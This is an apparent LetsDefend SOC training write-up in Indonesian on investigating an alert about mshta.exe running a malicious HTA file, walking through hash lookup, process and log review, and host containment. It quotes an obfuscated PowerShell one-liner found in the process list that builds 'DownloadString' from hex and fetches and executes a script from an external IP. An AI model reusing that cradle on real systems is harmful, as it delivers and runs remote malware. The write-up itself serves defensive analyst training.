[letsdefend.io] SOC164 — Suspicious Mshta Behavior

Pada tantangan kali ini, kita disuruh untuk menginvestigasi alert pada SIEM berupa binary Mshta.exe yang menjalankan file .hta berbahaya.

Mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) files. As its full name implies, Mshta can execute Windows Script Host code (VBScript and JScript) embedded within HTML in a network proxy-aware fashion.

https://redcanary.com/threat-detection-report/techniques/mshta/

HTA is short for HTML Application, which are programs based on HTML and one or more scripting languages supported by Internet Explorer, usually VBScript or JScript.

https://www.malwarebytes.com/blog/news/2016/09/surfacing-hta-infections/amp

Pertama-tama, silahkan tekan tombol take ownership pada alert tersebut di tab “main channel”. Maka akan masuk ke tab “investigation channel”. Kemudian klik tombol “create case” (tombol panah >>). Setelah tombol “create case” ditekan, maka alert tersebut akan masuk ke tab “case management” lalu klik “Start playbook!” Untuk menyelesaikan alert ini.

Dari alert tersebut, kita mendapatkan data sebagai berikut:

- IP address: 172.16.17.38
- Hostname: Roberto
- File hash:
6685c433705f558c5535789234db0e5a
- Alert trigger reason: Low reputation hta file executed via mshta.exe
- Related binary: mshta.exe

Klik tombol “Start playbook!” Pada tab “Case management”, Kemudian jawablah pertanyaannya.

Is the current activity suspicious?

Jika kita mengecek file hash tersebut di virustotal.com, maka kita mendapatkan hasil berikut:

Ternyata file .hta tersebut merupakan Trojan.

Answer: yes, suspicious

What is suspicious activity?

Jika kita klik tab “Endpoint security” lalu mencari nama host “Roberto”, pada bagian “Processes”, kita mendapatkan sebuah command mencurigakan seperti berikut:

C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe function H1($i) {$r = ‘’ ;for ($n = 0; $n -Lt $i.LengtH; $n += 2){$r += [cHar][int](‘0x’ + $i.Substring($n,2))}return $r};$H2 = (new-object (‘{1}{0}{2}’ -f’WebCL’,’net.’,’ient’));$H3 = H1 ‘446f776E’;$H4 = H1 ‘6C6f’;$H5 = H1 ‘616473747269’;$H6 = H1 ‘6E67’;$H7 = $H3+$H4+$H5+$H6;$H8 = $H2.$H7(‘http://193.142.58.23/Server.txt');iEX $H8

Tidak paham maksudnya? Tenang, kita tanya ChatGPT 😁

Sekarang kita tahu bahwa command tersebut digunakan untuk mendownload lalu mengeksekusi script berbahaya dari internet.

Jika digabungkan maka akan seperti ini:

Jika kita klik tab “Log management” dan melakukan pencarian dengan filter:

- Column: source_address
- Operator: equals
- Value: 172.16.17.38

Maka kita akan menemukan terdapat komunikasi eksternal ke IP address 193.142.58.23 yang mengakses URL http://193.142.58.23/Server.txt.

Answer: execution

Who performed the activity?

Kita bisa melihat parent processnya yaitu mshta.exe. Itu berarti dijalankan oleh user

Answer: user

Containment

Klik tombol containment pada host “Roberto” di “Endpoint security”.

Add artifacts

Setelah playbook selesai, maka akan diarahkan ke tab “Investigation channel” lagi. Kemudian klik tombol centang pada alert tersebut.

Kita berhasil menyelesaikan alert tersebut dengan benar.